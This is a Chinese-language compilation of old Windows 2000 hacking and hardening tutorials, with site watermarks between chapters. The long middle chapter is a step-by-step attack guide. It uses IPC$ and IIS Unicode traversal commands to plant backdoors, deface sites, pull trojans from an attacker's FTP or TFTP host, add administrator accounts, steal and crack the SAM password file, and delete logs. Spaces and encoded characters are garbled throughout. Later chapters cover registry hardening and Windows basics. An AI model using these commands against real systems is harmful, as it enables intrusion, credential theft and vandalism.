  RemoteProcedureCall(RPC)(远程过程调用):一种消息传递功能。在计算机的远程管理期间它允许分布式应用程序(即COM+应用程序)呼叫网络上不同计算机上的可用服务。看起来我们好像可以禁用它,但你可能不知道有很多服务需要依赖它的运行,如:FaxService、NetworkConnections、Telephony等,所以还是保持它为“自动”吧!
  RemoteRegistryService(远程注册表服务):该服务能使您编辑另一台计算机上的注册表。普通单机用户根本没必要使用这个服务。
  RunAsService(以其他用户身份运行服务的服务):当您以一般权限用户身份登录系统,而在使用中又需要修改只有系统管理员才能修改的系统设置项时,该服务提供了不重启系统以管理员身份登录的捷径。您只需要在命令提示符下运行RunAs命令就可达到更改目的。对于一般用户在未熟悉RunAs命令用法之前可以将其设为“已禁用”。
  SmartCard和SmartCardHelper:这两个服务提供对智能卡设备的支持,将其设为“已禁用”。
  TaskScheduler(计划任务):还记得Win9X中的“计划任务”吗?在Win2K中它的作用是相同的。它能使程序在预定的时间自动运行,如定期进行磁盘碎片整理。如果您认为它碍事,禁用它是个好主意,为什么要让不用的东西白白占用系统资源呢?
  TCP/IPNetBIOSHelperService(TCP/IPNetBIOS支持服务):该服务能在TCP/IP上提供NetBIOS支持。前面我们曾提到过NetBIOS是基于局域网的,因此作为访问Internet资源的一般用户可以禁用它,除非您的系统处在局域网中。
  Telephony(电话):简单地说这个服务能为计算机提供电话拨号的能力。如果您使用拨号方式连接到Internet或通过电话线连接其他计算机,就应将其设为“手动”。Telnet:该服务允许您从远程计算机上登录以本系统并且使用命令行方式操作这台计算机。对于一般单机用户该服务并不重要,可以设为“手动”或“已禁用”。
  UninterruptiblePowerSupply(不间断电源):管理连接到计算机的不间断电源(UPS)的服务。如果您没有UPS设备就设为“已禁用”。
  WindowsManagementInstrumentation(Windows管理规范)和WindowsManagementInstrumentationDriverExtensions(Windows管理规范驱动程序扩展):WMI是Win2K中的基础管理结构,它通过一组常用接口控制和监视系统(如对系统属性的查看与更改、设置用户权限等)。为加快系统启动速度,我们可以将这两个服务设置为“手动”,待系统启动后在需要的时候再自动用它们。
U优书萌 uUtxt。cOM 荃文吇扳越读


第二卷 第一十四章 字数:10973
  ?Win2000的漏洞我知道的也就这几个在这献丑了
  先什么呢?????就ipc$吧毕竟这个好理解什么是ipc$我就不说了,我也不大明白
  ipc探测大多基于139用的工具当然是流光了呵呵其实还有别的工具也可以探测,我个人认为还是流光好.怎么用流光的ipc探测帮助里写的相当相当详细了
  流光的帮助是我见过黑客教学最傻瓜的了大家知道探测出密码了,可以用种植者
  种植但是有时启动不起来那还要我们来帮助它吧呵呵
  netuse\\**.**.***.***\ipc$"quot;密码"quot;/user:"quot;这个你自己猜吧"quot;
  ***是目标的位置就是ip好象这是废话呵呵
  copy\tools\srv.exe\\202.**.**.**\admin$\system32这个就是把srv.exe复制到肉鸡上
  nettime\\203.161"gt;**.**这个就是查看肉鸡的时间
  比如说是02:22这个有可能是02:22还有可能是14:22
  at\\203.**.**.**TIMEsrv.exe这样就启动了srv.exe了
  然后就telnet203.**.**.**99(srn.exe其实就是在99端口开启个后门呵呵)
  上去了吧哈哈对了上去也不代表我就控制了机器呀对呀你还要成为管理员这样就方便多了呵呵
  命令是netuser用户/add这个是创建个用户
  netlocalgroupadministrators用户/add这呀就是把刚才你加的用户加到管理员权限里
  好了现在你是管理员了呵呵2000的一个很有用的就是做跳板
  netsvc\\127.0.0.1telnet/stop
  netsvc\\127.0.0.1telnet/start
  这两个命令最好还是在肉鸡上执行
  好象快点
  好了ipc就介绍到这吧其实net命令很有用的强烈推荐大家好好看看命令详解
  下面呢????好就cgi吧哈哈这个好象难了点我看见不少人都问怎么用好我就给大家介绍介绍我其实也不怎么熟的呵呵这是我转来得大家好好看看我也懒
  一、Unicode漏洞的实现
  要利用unicode利用,先要知道如何实现,通常,我们通过以下几种途径来利用Unicode漏洞:
  --http://www.exsample.com/scripts/..蜡..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  http://www.exsample.com/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  http://www.exsample.com/_vti_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  http://www.exsample.com/_mem_bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  http://www.exsample.com/cgi-bin/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  如果浏览器返回C:的目录列表,那么就可以继续了。其中,从dir开始是真正的命令,用连接命令。(注:下面将不再把前面的地址写上,直接为命令)
  二、如何修改对方主页?
  通常,在系统盘的目录下有Inetpub目录.其中有个wwwroot目录是用来存放主页空间的。
  先dirC:\Inetpub\wwwroot\察看目录:
  返回:
  ======================================================
  DirectoryofC:\inetpub\wwwroot
  =========================================================
  接着:我们就
  delc:\inetpub\wwwroot\default.asp
  echoHackedByHacker"gt;c:\inetpub\wwwroot\default.asp
  利用echo命令和重定向符号创建新文件.
  三、如果主页不在默认路径下,如何知道在哪里?
  我们可以到他的主页上,选取他的标题图片,右键点击,看它的文件名。比如:exsample.gif
  于是,我们用:
  dirc:\exsample.gif/s
  dird:\exsmaple.gif/s
  ...
  这样可以搜索到它的标题图片,通常在主页的images目录下,那么这个目录的上级目录就是存放主页的。
  按照二中所讲的方法可以修改其主页。
  四、如何将文件上传?
  这个是我们最关心的了,因为一旦上传了如ncx99一样的程序,那么有些事就好办多了。偷懒的人也许上传个冰河上去:)。
  方法:(俗称ftp方法)
  echoopenftp.xxx.com(ftp主机)"gt;c:\temp.1(可以随便取个名字,最好放到隐蔽的地方)
  echouseryourname"gt;"gt;c:\temp.1yourname是你的用户名
  echoyourpasswd"gt;"gt;c:\temp.1yourpasswd是你的密码
  echogetncx99.exe"gt;"gt;c:\temp.1你要下载的文件
  echoquit"gt;"gt;c:\temp.1
  ftp/s:c:\temp.1
  好了,过一会儿,用dir察看当前目录,就会看见ncx99.exe,酷!接下来如何,不用说了吧!
  五、如何做个很大的文件?
  我们可以用bat文件来实现。用echo建立如下文件,注意扩展名为bat:
  @echooff
  echobig"gt;x.x
  :w
  copyx.xx.xx.x
  gotow
  这样,就会……呵呵,不用说了吧,但这个好像不好。也可以上传个程序过去。这个只不过比较方便。
  六、万一遇到长文件名怎么办?
  这是很菜鸟的问题,但确实有人不会用,我在这里简单地说一下:
  例如:
  c:\programfiles\microsoftbillgates\hackermanandwoman.txt
  如何表示?用:
  c:\"quot;program20%files"quot;\"quot;microsoft20%billgates"quot;\hackermanandwoman.txt
  七、如何删除脚印(日志)?
  用如下命令:
  delC:\winnt\system32\logfiles\*.*
  delC:\winnt\ssytem32\config\*.evt
  delC:\winnt\system32\dtclog\*.*
  delC:\winnt\system32\*.log
  delC:\winnt\system32\*.txt
  delC:\winnt\*.txt
  delC:\winnt\*.log
  八、如何创建新的用户名,并将用户名加入Administrator组?这个不一定会成功,由于你没有足够的权限。除非碰到一些傻瓜网站。
  我们可以用echo创建一个bat文件。包含一下命令:
  netuserMynameMyPasswd/add/expires:never
  netlocalgroup"quot;administrators"quot;/addMyname
  然后,执行这个bat,就可以了。记得把它删除哦!
  九、如何获得SAM数据库?
  先用上传文件的方法上传samdump,然后用它把sam库拷贝到别的地方(直接下载SAM库是不行的)。
  比如samdumpC:\winnt\system32\config\samC:\temp.aaa
  然后在把temp.aaa上传到你的ftp服务器上,也可以把它拷贝到主页目录下,用浏览器下载。
  本篇文章允许转载,但请注明由eastdark所著
  呵呵上面说的其实很简单的
  http://*****.***"gt;***/msadc/..蜡..蜡..蜡../winnt/system32/cmd.exe?/cdirc:\
  这个就是最经典的unicode漏洞了最主要是能用命令呵呵/winnt/system32/cmd.exe?/c这个后面就是用命令的地方比如要看system32文件夹的内容就是/winnt/system32/cmd.exe?/cdirc:\winnt\system32
  还有别的命令呵呵
  ../winnt/system32/cmd.exe?/ccopyc:\winnt\repair\sam._c:\inetpub\wwwroot\
  这个就是把sam复制到wwwoot呵呵到了那你知道要干什么了吧当然了下载后破解密码呀哈哈对了破解密码的时间可不短呀呵呵不管是什么漏洞都是为了得到管理员权限我们既然把srv.exe复制到肉鸡上了当然是启动他了用ftp你可以自己社定地址比如你把srv.exe复制到C:\Inetpub\scripts\里了启动它就是winnt/system32/cmd.exe?/cC:\Inetpub\scripts\srv.exe
  既然启动你还塄着干什么telnet呀呵呵还是99端口呀
  我再给大家介绍一篇
  最近这些日子好多的WINNT的服务器被黑,尤其是国内的。下面是一些具体示例的总结。
  下面这类型的漏洞以发现近一年多了,一年多前在国外的黑客网站就有了类似的文章,但是当时
  并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。
  不过直到UNICOUDE漏洞的发现,黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总结一下。
  希望大家能从这里体会到点什么。(下面的文章来自一些邮件列表和BBS)
  原理:(其实原来都很相似,我拿这个做个例子。)
  NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞,
  导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode
  字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执
  行某些web根目录以外的文件。
  对于IIS5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"quot;?hh"quot;
  或者"quot;?hh"quot;,它会首先将其解码变成:0xc10xhh,然后尝试打开这个文件,Windows系统
  认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果0x00"lt;=%hh"lt;0x40的话,
  采用的解码的格式与下面的格式类似:
  ?hh-"gt;(0xc1-0xc0)*0x400xhh
  ?hh-"gt;(0xc0-0xc0)*0x400xhh
  因此,利用这种编码,我们可以构造很多字符,例如:
  ?-"gt;(0xc1-0xc0)*0x400x1c=0x5c='/'
  ?-"gt;(0xc0-0xc0)*0x400x2f=0x2f='\'
  攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
  (1)如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
  列出当前目录的内容:
  http://www.victim.com/scripts/..?../winnt/system32/cmd.exe?/cdir
  (2)利用这个漏洞查看系统文件内容也是可能的:
  http://www.victim.com/a.asp/..?../..?../winnt/win.ini
  RainForestPuppy"lt;rfp@WIRETRIP.NET"gt;测试发现对于英文版的IIS4.0/5.0,此问题同样
  存在,只是编码格式略有不同,变成"quot;蜡"quot;或者"quot;翜"quot;.
  下面我们的例子以?为主讲解。
  注:号可以用代替,依这种格式你还可以构造出许多命令
  好多站点\inetpub\下的scripts目录删除了,
  但\ProgramFiles\CommonFiles\System\下
  的msadc还在(有msadcs.dll漏洞的话就不用
  ?了)。这时可以如下构造请求:
  http://ip/msadc/..?../..?../..?../winnt/system32/cmd.exe?/cdirc:\
  实践一:(修改主页----最简单化的一种)
  很多入侵都以修改主页的形式表现出来,这通常有两种情况:一是表达自己的
  愤慨--比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后,国内很多黑客
  在ICQ、BBS一呼百应,纷纷对敌国进行各种形式的攻击,当然以替换主页最为大快人心!
  二是在给网管发e-mail漏洞报告之后没反应,有的黑客按耐不住,就用修改主页的方式给予警告,
  用以引起人们对于安全技术的重视。当然说起来这是违法的啦,所以大家要注意哦,不要光图一时的痛快,
  呵呵!
  可以使用ECHO命令、管道符等建立文件,修改文件内容。但因为IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符“"amp;|(,;%"lt;"gt;”,如果发现有这些字符就会返回500错误,所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法绕过去。
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/ccopyc:\winnt\system32\cmd.exec:\inetpub\scripts\ccc.exe
  然后
  http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/cechoHackedbychinese"gt;f:\wwwroot\xxx\default.asp
  http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/cecho1/1/2001"gt;"gt;f:\wwwroot\xxx\default.asp
  就改了主页了!
  这种方法对于有负载均衡的主机很不方便,又需要几次才能完成,所以不好。袁哥给出了另一种更方便的办法。参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方法》,可以这样:
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd"quot;.exe?/cechoHackedbyhacker"gt;f:\wwwroot\xxx\default.asp
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd"quot;.exe?/cecho12/1/2k"gt;"gt;f:\wwwroot\xxx\default.asp
  这样,主页就被更改成了:
  Hackedbyhacker
  当然我是没有这样做啦,不过这些东西我都在自己配置的环境下实现了,
  在我练习的过程中发现,用ECHO写这些的时候很慢,如果你多次回车,过一阵屏幕刷新后主页上就会留下多个
  你要写的内容。
  实践二(下载SAM文件)
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32
  /cmd.exe?/cdirc:\发现列出了远程主机C:\下的所有文件,
  执行:
  http://xxx.xxx.xxx.xxx/scripts/..á../winnt/system32/cmd.exe?/c
  copyc:\autoexec.batc:\autoexec.bak成功实现文件的复制,
  执行:http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/
  cmd.exe?/cdelc:\autoexec.bak成功实现文件的删除,哇!太利害了。
  随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
  获得Administrator权限。
  执行:http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/
  cmd.exe?/ccopyc:\winnt\repair\sam._c:\inetpub\wwwroot\
  把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
  将sam._文件下载到本地,执行:
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/cmd.exe?/c
  delc:\inetpub\wwwroot\sam._清除痕迹。
  在本机执行:C:"gt;expandsam._sam
  启动l0phtcrack2.5(可到http://rina.yofor.com/7index.html下载),ImportSamFile...导入sam文件,OpenWordlistFile...
  打开一个字典,RunCrack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
  觉先!五分钟后来一看,Administrator的NtPassword居然是123456,我昏,
  网管们注意了,这种密码也可以取呀?执行:C:\"gt;newletmein\\xxx.xxx.xxx-admin
  扫描主机,发现管理员ID是:asdfghjk,执行:C:\"gt;netuse\\xxx.xxx.xxx.xxxc$
  winnt\system32\logfiles看了看,呵呵!
  实践三(用木马)
  如果你对netuse的使用不熟悉的话,可以找找相关的资料来看,net命令也是基本技能啊,好好掌握吧)
  在本地设定一个共享目录,比如f:\123,把ncx99.exe和冰河服务端放在里面,同时为了试验,
  放了一个0字节的1.txt;然后再tftp98中把目录指向f:\123,现在就要让对方运行tftp.exe来下载文件啦!
  http://xxx.xxx.xxx.xxx/scripts/cmd.exe?/ccopyc:\winnt\system32\tftp.exef:\wwwroot\scripts
  然后
  http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i111.111.111.111get1.txtcosys.txt
  (111.111.111.111表示我们的ip,或者是我们的tftp服务器ip)
  看,返回下面的内容:
  CGI錯誤
  所指定的CGI應用程式處理有誤,它未傳回完整的HTTP標題。所傳回的標題是:
  Transfersuccessful:0bytesin2seconds,0bytes/s
  这就成功啦!看看:
  http://xxx.xxx.xxx.xxx/scripts/sys.exe?/cdir1.txt
  果然有的,哈,继续:
  http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i111.111.111.111getncx99.exescripts.exe
  现在继续把冰河弄上去,国货精品,也让同胞们看看嘛!这是最方便的啦,哈哈!
  http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i111.111.111.111getG_Client.exec:\winnt\system32\iinter.exe
  返回:
  CGI錯誤
  所指定的CGI應用程式處理有誤,它未傳回完整的HTTP標題。所傳回的標題是:
  Transfersuccessful:266240bytesin271seconds,982bytes/s
  成功啦,这样,我们就可以先让它中木马啦!
  http://xxx.xxx.xxx.xxx/scripts/..?../winnt/system32/inter.exe
  之后,用客户端连接过去,找到自己需要的东西,什么?你不知道你需要什么?
  那你进去干什么?!学习啊?好啊,学到什么啦?总结一下,把纪录删掉(或者改写?覆盖?你自己想吧)
优悠书盟 uUTXT.cOM 全蚊字扳月读


第二卷 第一十五章 字数:3544
  ?1)设置生存时间
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
  DefaultTTLREG_DWORD0-0xff(0-255十进制,默认值128)
  说明:指定传出IP数据包中设置的默认生存时间(TTL)值.TTL决定了IP数据包在到达
  目标前在网络中生存的最大时间.它实际上限定了IP数据包在丢弃前允许通过的路由
  器数量.有时利用此数值来探测远程主机操作系统.
  2)防止ICMP重定向报文的攻击
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
  EnableICMPRedirectsREG_DWORD0x0(默认值为0x1)
  说明:该参数控制Windows2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文.
  3)禁止响应ICMP路由通告报文
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
  PerformRouterDiscoveryREG_DWORD0x0(默认值为0x2)
  说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常.因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用.
  4)防止SYN洪水攻击
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
  SynAttackProtectREG_DWORD0x2(默认值为0x0)
  说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时
  间.路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,
  则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和
  TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施.
  5)禁止C$、D$一类的缺省共享
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
  AutoShareServer、REG_DWORD、0x0
  6)禁止ADMIN$缺省共享
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
  AutoShareWks、REG_DWORD、0x0
  7)限制IPC$缺省共享
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
  restrictanonymousREG_DWORD0x0缺省
  0x1匿名用户无法列举本机用户列表
  0x2匿名用户无法连接本机IPC$共享
  说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQLServer
  8)不支持IGMP协议
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
  IGMPLevelREG_DWORD0x0(默认值为0x2)
  说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个
  bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉.改成0后用
  routeprint将看不到那个讨厌的224.0.0.0项了.
  9)设置arp缓存老化时间设置
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
  ArpCacheLifeREG_DWORD0-0xFFFFFFFF(秒数,默认值为120秒)
  ArpCacheMinReferencedLifeREG_DWORD0-0xFFFFFFFF(秒数,默认值为600)
  说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期.如果ArpCacheLife小于ArpCacheMinReferencedLife,
  未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期.每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
  10)禁止死网关监测技术
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
  EnableDeadGWDetectREG_DWORD0x0(默认值为ox1)
  说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关.有时候这并不是一项好主意,建议禁止死网关监测.
  11)不支持路由功能
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
  IPEnableRouterREG_DWORD0x0(默认值为0x0)
  说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题.
  12)做NAT时放大转换的对外端口最大值
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
  MaxUserPortREG_DWORD5000-65534(十进制)(默认值0x1388--十进制为5000)
  说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数.正常情况下,短期端口的分配数量为1024-5000.将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534).使用NAT时建议把值放大点.
  13)修改MAC地址
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
  找到右窗口的说明为"网卡"的目录,
  比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
  展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel(R)82559FastEthernetLANonMotherboard"
  然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"
  然后重起计算机,ipconfig/all看看.
u優书萌 uUTXt.COm 诠汶子版粤渎


第三卷 第一章 字数:1358
  ?0x0000操作完成
  0x0001不正确的函数
  0x0002系统找不到指定的文件
  0x0003系统找不到指定的路径
  0x0004系统无法打开文件
  0x0005拒绝存取
  0x0006无效的代码
  0x0007内存控制模块已损坏
  0x0008内存空间不足,无法处理这个指令
  0x0009内存控制模块地址无效
  0x000a环境不正确
  0x000b尝试载入一个格式错误的程序
  0x000c存取码错误
  0x000d资料错误
  0x000e内存空间不够,无法完成这项操作
  0x000f系统找不到制定的硬盘
  0x0010无法移除目录
  0x0011系统无法将文件移到其他的硬盘
  0x0012没有任何文件
  0x0019找不到指定的扇区或磁道
  0x001a指定的磁盘或磁片无法存取
  0x001b磁盘找不到要求的扇区
  0x001c打印机没有纸
  0x001d系统无法将资料写入制定的磁盘
  0x001e系统无法读取指定的装置
  0x001f连接到系统的某个装置没有作用
  0x0021文件的一部分被锁定
  0x0024开启的分享文件数量太多
  0x0026到达文件结尾
  0x0027磁盘已满
  0x0036网络繁忙
  0x003b网络发生意外的错误
  0x0043网络名称找不到
  0x0050文件已经存在
  0x0052无法建立目录或文件
  0x0053int24失败
  0x006b因为代用的磁盘尚未插入,所以程序已经停止
  0x006c磁盘正在使用中或被锁定
  0x006f文件名太长
  0x0070硬盘空间不足
  0x007f找不到指定的程序
  0x045b系统正在关机
  0x045c无法种植系统关机,因为没有关机的动作在进行中
  0x046a可用服务器储存空间不足,无法处理这项指令
  0x047e指定的程序需要新的Windows版本
  0x047f指定的程序不是Windows或MS-DOS程序
  0x0480指定的程序已经启动,无法再启动一次
  0x0481指定的程序是为旧版的Windows所写的
  0x0482执行此应用程序所需的程序库文件之一毁坏
  0x0483没有应用程序与此项操作的指定文件建立关联
  0x0484传送指令到应用程序发生错误
  0x04b0指定的装置名称无效
  0x05a2窗口不是子窗口
  0x05aa系统资源不足,无法完成所要求的服务
  0x05ab系统子还不足,无法完成所需要的服务
  0x05ac系统资源不足,无法完成所要求的服务
  0x06b9资源不足,无法完成操作
U憂书盟 uutxt。COm 铨汶自坂越渎


第三卷 第二章 字数:1115
  ?务器被入侵,很多时候我们无法预测会出现何种漏洞,但很多hacker都习惯性的通过提升Guest账号的权限,
  再通过这个没有密码的Guest账号来访问你的机器。要是能删掉Guest就好了、、、
  说起来好像很容易,但其实你打算删的时候就会发现,Guest账号同Administrator账号一样,没办法删掉。
  当然,这并非不可能,下面就是方法:
  一、在NT4.0环境里删掉Guest账号
  很容易了,因为已经有现成的工具被人写出来了。
  DelGuest下载,官方网站http://www.ntsecurity.nu/toolbox/delguest/
  很久以前NT4.0的时候,我就用过这个工具了,虽说微软并不赞同这个做法,呵呵
  但,从我了解的资料看,的确并没有影响到系统原本的正常运行。
  二、在Windows2K环境里删掉Guest账号
  没有现成的工具,也可能是我还没找到吧。呵呵
  一些线索:Windows系统的账号信息,是存放在HKEY_LOCAL_MACHINE\SAM里的,但是
  直接打开注册表想去修改却并不能打开它,哪怕你是管理员权限都不行。
  因为为了安全性考虑,必须由“SYSTEM”权限才能访问。
  所以整理一下,大致思路是这样的:
  以“SYSTEM”权限启动注册表,然后检查注册表项,把账号Guest删掉。
  首先,我们以AT来添加一个计划任务,看了一下时间13:51,OK,设定一分钟后运行。
  使用AT,目的是以“SYSTEM”权限运行。
  /interactive,目的是让运行的程序以交互式界面的方式运行。
  趁程序还在等待调度,我们先看看Guest账号的资料
  呵呵,想想待会它就没了,还是很爽的
  ok,13:52了,regedt32程序运行了
  打开注册表程序
  把HKEY_LOCAL_MACHINE\SAM\Domains\Account\Users下的两个相关键删掉。
  一个是000001F5,一个是Names下的Guest
  呵呵,怎么删不用我讲了吧
  然后呢,我们再检查一下,账号
  netuserguest
  不见了吧
  好的,就到这里。
  另,如果是win2k域模式下,推荐不要删掉Guest账号,我没有测试过,不知道会不会出现什么问题。
优悠书盟 uuTxT.CoM 诠蚊自坂阅读


第三卷 第三章 字数:11479
  ?菜鸟菜记之安全与黑客纵览
  未经同意而又不是中国安全网的核心或者斑竹请勿转载,否者后果自负
  收集编辑:Eternal(陈小风)中国安全网:http://www.chinasafe.net/
  我的名字叫陈小风今年都有18岁了,爱好是上网.游泳.聊天。在中专读网络工程和电子商务,第3个学期刚结束,学校就要我们去实习,自己找工作做了,这段时间我为大家收集和整理编写了一些菜鸟技术知识让大家看看,教程一共是12章,教程名字叫菜鸟菜记之安全与黑客纵览(这些文章是我接触黑客到现在自己总结的.书上看到的.网络找到文章而整理回来的),以后会慢慢推出。因本人以前语文没学好水平太差劲所以语文表达能力差请大家别见怪,进入正题把,LOOK:
  第一章初级了解系统.BUG.协议
  No.1Win一族的产品系列简介
  在1983年春季就宣布开始研究开发Windows
  Win3.x
  Microsoft于1990年5月份推出Windows3.0,这是个人操作系统的产品。操作命令图形化系统,使用起来容易简单,但是由于技术和设计等各方面上的不成熟,Win3.X当时并未在个人操作系统领域里可以“一统江湖”。
  Win95
  于1995年8月推出新一代操作系统Windows95(又名Chicago),这是Win家族系列的又一产品,虽然Win95功能不健全,经常当机(死机),安全隐患更加数不尽数,但是,微软正是靠Win95才可以垄断了个人操作系统平台的市场。所以Win95应该也可以说是微软的骄傲。
  Win97-98-ME
  98年【9月1日】Windows98中文版全国首发,凌晨0:00-1:38华特连邦举办了“午夜疯狂”首发活动
  这些只能说是Win95的升级版,只是在功能和安全方面做了很多弥补系统程式BUG(漏洞)而已。98:游戏系统平台,一般我们这些年纪的人都知道他的存在,大家都爱玩游戏嘛,但是说到Hacker(黑客)这方面就简直谈不上了.ME:这个系统比起98来可以说功能和界面都要好多了,但是ME(我)还是个人系统也谈不上什么网络服务器,那怎么学习入侵呢,下面请看。
  WinNT/2000
  微软(中国)有限公司今天宣布,业界期待已久的其面向新世纪的划时代产品Windows2000中文版在IT界的广泛支持下,于2000年3月20日在中国隆重上市
  一般这两种操作系统多数用在网络来做服务器使用,公司或者网吧类的大部分都是使用这些系统。NT在局域网领域中是比较受欢迎的,在网络中因为NT安全性不佳正慢慢的被Win2000所替代。我也是用2K(WIN2000),2K因为对硬件配置要求较高,学生或者不太富裕的学习者们一般都没这么多金钱配置的,因此市场普及还须要一段时间,不过到了现在IT业的迅速发展,昨天帮人装电脑已经说出到P42.6G了,不知道有没有记错,我对硬件没什么去了解和认识,主流电脑的价格一般在于5千到6千之间了,所以大多数人也开始装起P4用起2K来了,NT倒听少人用了,不过还有很多公司用着呢。
  WinXP
  2001年11月9日在北京举办的的WindowsXP首发活动
  WINXP虽说微软声称这是个人操作系统领域里的第二次改革产品,但是我个人总的感觉来说XP没有2K这么好用,虽然他的功能比2K强大多了,但是我还是不喜欢用XP,或许等以后XP更加的成熟可靠,我也是要跟着IT业的迅速发展而改使用XP的。XP的占硬盘总容量居然达到1.2G,据说程序代码就有4000万行之多,晕,好雄伟的创举啊。并且声称“永不死机”。和我英文名Eternal有点相似啊,我的英文名的意思是永恒,他是永不啊。是不是真的永不死机呢?当然,你用了就了解了。还有一点,说说装XP系统PC配置的要求,P31G以上,最好就P4拉,不然你体会不到XP的爽只能体会到XP的慢啊,^ō^
  第2小节
  NO.1.2WindowsBUG(漏洞)简介
  NO.1.2.1什么是WindowsBUG
  系统的BUG也称安全缺陷.安全隐患,这些安全隐患会被技术菜与不菜的Hacker(入侵者)所利用,从而达到控制目标主机或造成一些偷窃秘密.做间谍.或更具破坏性的目的。
  NO.1.2.2为什么会存在BUG
  BUG的产生大致可分为两种类:
  第1类:一些程式员在编写程序过程中,因程式员为了达到些不可告人的目的或是商业意图,有意无意的在程序的隐蔽处留下各种各样的后门,供日后自己使用,随着社会的不断变化,法律也不断的完善,这类漏洞将越来越少(但是还有些有意者留下的,而我们就可以利用这些达到入侵目的)。
  第2类:由于一些程式员的水平.经验问题和当时安全与加密技术方法运用的不当,或者简直不会。在程序中总会多多少少有些不足的地方没别发现,这些地方有的影响程序的运行效率,有的会导致非授权用户的权利提升(也就是我们从普通的用户提升到ADMIN权限用户),安全与不安全从来都是敌对的。所以网络系统和某些程式都有很多BUG让我们去利用,而安全的呢,就可以让我们去补救。
  第3小节
  1.3Win核心的常用网络协议
  在网络中不同样的工作站,或者服务器之间能传输数据.文件.程式等等很多很多,就是因为有网络协议的存在。随着网络的迅速发展,不同的开发商.公司.集团,都开发了不同的通信方式。为了使通信成功.可靠.稳定,网络中的所有主机都必须使用同一语言,不能带有方言另语。因而必须开发出严格标准的定义主机与主机之间的每个信息包中每个字节中的每一位。这些严格标准来自于多个庞大组织的努力,约定好通用的通信方式:即协议。
